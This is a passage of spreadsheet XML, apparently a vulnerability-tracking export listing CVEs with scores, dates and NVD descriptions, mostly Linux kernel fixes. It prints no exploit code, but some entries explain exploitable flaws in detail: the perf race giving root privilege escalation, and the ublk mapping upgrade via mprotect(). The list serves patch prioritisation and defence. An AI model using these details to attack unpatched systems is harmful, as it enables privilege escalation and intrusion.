      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89161</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L471" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr"/>
      <c r="Q471" s="5" t="inlineStr">
        <is>
          <t>CWE-590</t>
        </is>
      </c>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>In PCRE2 before 10.48, pcre2_jit_match mishandles a previously copied subject being passed in as a context. An incorrect free operation can occur.</t>
        </is>
      </c>
      <c r="S471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89161</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89789</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr"/>
      <c r="Q472" s="5" t="inlineStr"/>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
gtp: add synchronize_net() in gtp_newlink() error path to prevent use-after-free
gtp_newlink()'s error path frees tid_hash and addr_hash without
waiting for an RCU grace period after clearing sk_user_data. A
concurrent gtp_encap_recv() in softirq may still hold the gtp_dev
pointer obtained via rcu_dereference_sk_user_data() and access the
freed memory.
  BUG: KASAN: slab-use-after-free in gtp0_pdp_find+0x1f6/0x200 (gtp.c:152)
  Call Trace:
   &lt;IRQ&gt;
   gtp0_pdp_find+0x1f6/0x200
   gtp_encap_recv+0x527/0x24b0
   udp_queue_rcv_one_skb+0x75f/0xc10
Add synchronize_net() before the kfree calls in out_hashtable, which
covers all error paths from both gtp_encap_enable() and
gtp_create_sockets().</t>
        </is>
      </c>
      <c r="S472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89789</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89791</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr"/>
      <c r="Q473" s="5" t="inlineStr"/>
      <c r="R473" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf: Fix use-after-free when perf mmap() revival races with the last munmap()
perf_mmap_close() drops rb-&gt;mmap_count *without* holding
event-&gt;mmap_mutex (the refcount_dec_and_test() right before the
refcount_dec_and_mutex_lock() of event-&gt;mmap_count). A concurrent
perf_mmap_rb() can slot its entire "revival" path into that window
(perf_mmap holds event-&gt;mmap_mutex for its whole duration, including
rb_alloc):
  munmap side (perf_mmap_close)          mmap side (perf_mmap_rb)
  -----------------------------------    --------------------------------
  rb-&gt;mmap_count 1 -&gt; 0   (no lock)      (holds event-&gt;mmap_mutex)
                                         inc_not_zero(rb-&gt;mmap_count) fails
                                         ring_buffer_attach(event, NULL)
                                         rb_alloc() + attach new rb
                                         refcount_set(&amp;event-&gt;mmap_count, 1)
  lock; event-&gt;mmap_count 1 -&gt; 0
  ring_buffer_attach(event, NULL)
  ring_buffer_put() -&gt; frees the *new* rb
The revival's refcount_set(&amp;event-&gt;mmap_count, 1) is an invisible
1 -&gt; 1 write: the close frees the just-revived buffer although the
other process still has it mapped -- a page-level use-after-free
allowing local privilege escalation to root by any unprivileged user
(default kernel.perf_event_paranoid=2).
Swap the order of the two counter updates: event-&gt;mmap_count is
dropped first via refcount_dec_and_mutex_lock(), so its 1 -&gt; 0
transition and the ring_buffer_attach() stay serialized with
perf_mmap(). rb-&gt;mmap_count == 0 then implies every event using the
buffer is detached already, so the result of the rb-&gt;mmap_count drop
can gate the remaining teardown directly and detach_rest is no longer
needed.
An earlier fix for this race from Kyle Zeng and David Lee takes
event-&gt;mmap_mutex around both counter updates [0]; here the not-last
close stays lockless.</t>
        </is>
      </c>
      <c r="S473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89791</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89793</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr"/>
      <c r="Q474" s="5" t="inlineStr"/>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ublk: clear VM_MAYWRITE on read-only ublk char device mmap
ublk_ch_mmap() rejects mmap requests with VM_WRITE set, but never
clears VM_MAYWRITE on the resulting read-only mapping. This allows
a userspace daemon to mmap the per-queue command buffer PROT_READ,
then upgrade it to PROT_WRITE via mprotect(), since VM_MAYWRITE was
never cleared.
The command buffer holds struct ublksrv_io_desc entries that are
kernel-written ABI; a writable mapping lets an unprivileged daemon
process corrupt fields such as addr, op_flags, nr_sectors, and
start_sector.
Same bug class as the drm/panthor and drm/vc4 VM_MAYWRITE fixes, and
the 2026-08-13 ptp/vmclock fix (a5edadbae57e).
Verified via mprotect() PoC: before the fix, a PROT_READ mapping can
be upgraded to PROT_READ|PROT_WRITE and a write into the command
buffer corrupts io_desc fields (confirmed under KASAN). After the
fix, mprotect() returns -EACCES.</t>
        </is>
      </c>
      <c r="S474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89793</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89799</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="inlineStr"/>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr"/>
      <c r="Q475" s="5" t="inlineStr"/>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Disable preemption in bpf_get_stackid
The get_perf_callchain call needs disabled preemption plus we need
it disabled as long as we access its returned trace entries buffer.
Note the bpf_get_stackid_pe function is executed already with
preemption disabled.</t>
        </is>
      </c>
      <c r="S475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89799</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89801</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="inlineStr"/>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr"/>
      <c r="L476" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr"/>
      <c r="Q476" s="5" t="inlineStr"/>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/nouveau/uvmm: fix premature region free on failed OP_UNMAP_SPARSE
In nouveau_uvmm_bind_job_submit()'s OP_UNMAP_SPARSE arm, op-&gt;reg is set
from nouveau_uvma_region_find(), which only looks the region up and takes
no reference; a region's sole reference is its membership in
uvmm-&gt;region_mt. Two failure paths leave op-&gt;reg set: the -ENOENT check
when the region is busy, and the drm_gpuvm_sm_unmap_ops_create() failure.
The sibling nouveau_uvmm_sm_unmap_prepare() failure just below clears
op-&gt;reg; these two do not.
unwind_continue steps back one op, so the failing op is skipped by the
unwind loop and its op-&gt;reg stays set. nouveau_uvmm_bind_job_cleanup()
then enters its if (op-&gt;reg) branch and calls nouveau_uvma_region_remove()
and nouveau_uvma_region_put() on it, dropping the tree's sole reference
and freeing a region this job never created. The comment above the
cleanup loop documents the broken invariant: op-&gt;reg must be NULL on
submit failure.
This frees a live region on an unrelated failure, reachable single-job
when drm_gpuvm_sm_unmap_ops_create() returns -ENOMEM; if another job owns
the same region, its cleanup then removes and puts the freed region, a
use-after-free. Clear op-&gt;reg on both failure paths.</t>
        </is>
      </c>
      <c r="S476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89801</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89803</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="inlineStr"/>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr"/>
      <c r="Q477" s="5" t="inlineStr"/>
      <c r="R477" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/nouveau: unsubscribe the channel-kill event before the fence context
nouveau_channel_del() tears the fence context down first and only drops
the channel-kill subscription later, in the middle of the nvif object
teardown:
	if (chan-&gt;fence)
		nouveau_fence(chan-&gt;cli-&gt;drm)-&gt;context_del(chan);
	...
	nvif_object_dtor(&amp;chan-&gt;vram);
	nvif_event_dtor(&amp;chan-&gt;kill);
The subscribed handler is nouveau_channel_killed(), which calls
nouveau_channel_kill() and from there nouveau_fence_context_kill() on
chan-&gt;fence. A kill event delivered in that window takes fctx-&gt;lock and
walks fctx-&gt;pending on a fence context that context_del() has already
freed.
Nothing reaches this below Fermi today, because the subscription is
gated on FERMI_CHANNEL_GPFIFO and nothing kills a channel there. On
Fermi and newer the window is real but narrow, since a kill has to land
exactly while the channel is being destroyed. That is reason enough on
its own, which is why this carries a Fixes: tag. The last patch in this
series subscribes Tesla channels as well; nothing kills those today, so
it does not widen the exposure now, but it is the groundwork for a
recovery path that would, and the ordering is better fixed before that
lands than alongside it.
Drop the subscription before anything it depends on is torn down.</t>
        </is>
      </c>
      <c r="S477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89803</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89805</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="inlineStr"/>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr"/>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr"/>
      <c r="Q478" s="5" t="inlineStr"/>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/pagemap: Fix folio allocation fallback and use-after-put
drm_pagemap_migrate_populate_ram_pfn() had two issues when populating
RAM PFNs with higher-order folios:
1. The higher-order vma_alloc_folio()/folio_alloc() calls did not pass
   __GFP_NOWARN, so a THP allocation failure under memory pressure
   would spam the kernel log, and there was no fallback path despite a
   TODO comment stating one was needed. Add __GFP_NOWARN to the
   higher-order allocation and, on failure, fall back to order-0
   allocations for the entire range originally covered by the failed
   higher-order allocation, leaving MIGRATE_PFN_COMPOUND unset for
   those PFNs.
2. In the free_pages error path, order was computed via
   folio_order(page_folio(page)) *after* put_page(page) had already
   dropped the reference, resulting in a use-after-free/put when that
   was the last reference on the page. Compute order before releasing
   the page.
Introducing the fallback in 1. also requires the source page array
handed to -&gt;copy_to_ram() to be built differently. Both callers only
populated the entry at the head of each source folio, relying on the
copy callback to derive the rest of the folio from the order recorded
in the matching drm_pagemap_addr. Once the destination has been demoted
to order-0 folios the drm_pagemap_addr entries are per-page, so a source
page is needed for every one of them; leaving them NULL makes the copy
callback stop after the first page and the remainder of the range is
never copied.
The source folio is only split later, by migrate_vma_pages() /
migrate_device_pages(), so its order cannot be used to detect the
demotion - test the destination for MIGRATE_PFN_COMPOUND instead. Factor
the array population out into drm_pagemap_migrate_populate_src_pages()
and use it from both drm_pagemap_evict_to_ram() and
__drm_pagemap_migrate_to_ram().</t>
        </is>
      </c>
      <c r="S478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89805</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89808</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="inlineStr"/>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr"/>
      <c r="Q479" s="5" t="inlineStr"/>
      <c r="R479" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdkfd: Fix the case that vm range is hole at svm_migrate_copy_to_vram
When migration vm range is hole at cpu side(MIGRATE_PFN_MIGRATE set +
MIGRATE_PFN_VALID unset) driver still allocates device pages. There is no
dma map of src pages and migration. j is 0 and svm_migrate_copy_memory_gart()
will return an uninitialized r. That can trigger out_free_vram_pages to drop
all VRAM just set up.
Initialize r and only call the last svm_migrate_copy_memory_gart if j &gt; 0.
Current code postponed the last page to the final copy. This patch flushes on
the last page when reach to the end of current drm_buddy_block; avoids another
svm_migrate_copy_memory_gart.</t>
        </is>
      </c>
      <c r="S479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89808</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89810</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="inlineStr"/>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr"/>
      <c r="Q480" s="5" t="inlineStr"/>
      <c r="R480" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdkfd: Fix error path at svm_migrate_copy_to_ram
If page migration from device to sys ram fails for some reasons driver needs
release and unlock allocated system pages. To do that driver should use page
physical address, or pfn, then get struct page*. Current driver uses dma
address(for adev) that is not correct with IOMMU enabled, or even in general.
The patch releases and unlocks allocated system pages based on where migration
failed by struct page* of sys ram pages. Also dma_unmap correspodent system
ram pages at error path.</t>
        </is>
      </c>
      <c r="S480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89810</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89814</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="inlineStr"/>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr"/>
      <c r="Q481" s="5" t="inlineStr"/>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: clamp the isolation index for rings outside a partition
adev-&gt;isolation[] has one slot per partition, but a ring that is not
assigned to one keeps AMDGPU_XCP_NO_PARTITION, which is ~0, so indexing
the array with it is out of bounds. SDMA submissions hit this on both
the isolation enforcement and the VM flush path and trip UBSAN.
Fall back to the first slot the way the cleaner shader path already
does, and stop taking the address before the ring type check that makes
it relevant.</t>
        </is>
      </c>
      <c r="S481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89814</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89815</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="inlineStr"/>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr"/>
      <c r="Q482" s="5" t="inlineStr"/>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/ttm: Drop tt-&gt;restore after successful restore
ttm_pool_restore_and_alloc() can successfully complete the restore
process via ttm_pool_restore_commit(), but tt-&gt;restore is not dropped
afterward. As a result, subsequent backup/restore flows observe what
appears to be a completed restore, while in reality shmem handles are
still installed in tt-&gt;pages, leading to the stack trace below.
Fix this by freeing and dropping tt-&gt;restore in
ttm_pool_restore_and_alloc() upon successful completion of the restore.
20545 [  309.784531] RIP: 0010:sg_alloc_append_table_from_pages+0x38c/0x490
20547 [  309.809570] RSP: 0018:ffffc9000623b838 EFLAGS: 00010206
20548 [  309.814827] RAX: 0000000000001000 RBX: ffff88816e42a160 RCX: 0000000000000000
20549 [  309.821986] RDX: 0000000000002000 RSI: 0000000000000003 RDI: 0000000000001000
20550 [  309.829147] RBP: ffff88816e42a168 R08: 0000000000000002 R09: 000000007ffff000
20551 [  309.836310] R10: ffffc9000623b928 R11: 0000000000000000 R12: 000000007ffff000
20552 [  309.843471] R13: ffff88815ba5a100 R14: 0000000000000000 R15: 0000000000000001
20553 [  309.850634] FS:  00007f9ff305e700(0000) GS:ffff888276c94000(0000) knlGS:0000000000000000
20554 [  309.858749] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
20555 [  309.864519] CR2: 00007f9fca701000 CR3: 00000001565e2005 CR4: 0000000008f70ef0
20556 [  309.871678] PKRU: 55555558
20557 [  309.874403] Call Trace:
20558 [  309.876866]  &lt;TASK&gt;
20559 [  309.878988]  sg_alloc_table_from_pages_segment+0x60/0x100
20560 [  309.884415]  ? ttm_resource_manager_usage+0x36/0x60 [ttm]
20561 [  309.889845]  ? xe_tt_map_sg+0x7d/0xd0 [xe]
20562 [  309.894045]  xe_tt_map_sg+0x7d/0xd0 [xe]
20563 [  309.898037]  xe_bo_move+0x927/0xaa0 [xe]
20564 [  309.902029]  ttm_bo_handle_move_mem+0xba/0x170 [ttm]
20565 [  309.907022]  ttm_bo_validate+0xbe/0x190 [ttm]
20566 [  309.911405]  xe_bo_validate+0x9a/0x120 [xe]
20567 [  309.915663]  xe_gpuvm_validate+0xd9/0x140 [xe]
20568 [  309.920206]  drm_gpuvm_validate+0x2f0/0x5b0 [drm_gpuvm]
20569 [  309.925459]  ? drm_exec_lock_obj+0x63/0x210 [drm_exec]
20570 [  309.930627]  xe_vm_validate_rebind+0x46/0xb0 [xe]
20571 [  309.935428]  xe_exec_fn+0x20/0x40 [xe]
20572 [  309.939249]  drm_gpuvm_exec_lock+0x78/0xc0 [drm_gpuvm]
20573 [  309.944410]  xe_validation_exec_lock+0x5a/0xa0 [xe]
20574 [  309.949385]  xe_exec_ioctl+0x806/0xc30 [xe]
20575 [  309.953639]  ? ttwu_queue_wakelist+0xd9/0xf0
20576 [  309.957935]  ? __pfx_xe_exec_fn+0x10/0x10 [xe]
20577 [  309.962449]  ? __wake_up_common+0x73/0xa0
20578 [  309.966482]  ? __pfx_xe_exec_ioctl+0x10/0x10 [xe]
20579 [  309.971263]  drm_ioctl_kernel+0xa3/0x100
20580 [  309.975209]  drm_ioctl+0x213/0x440
20581 [  309.978637]  ? __pfx_xe_exec_ioctl+0x10/0x10 [xe]
20582 [  309.983415]  xe_drm_ioctl+0x67/0xd0 [xe]
20583 [  309.987408]  __x64_sys_ioctl+0x7f/0xd0</t>
        </is>
      </c>
      <c r="S482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89815</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
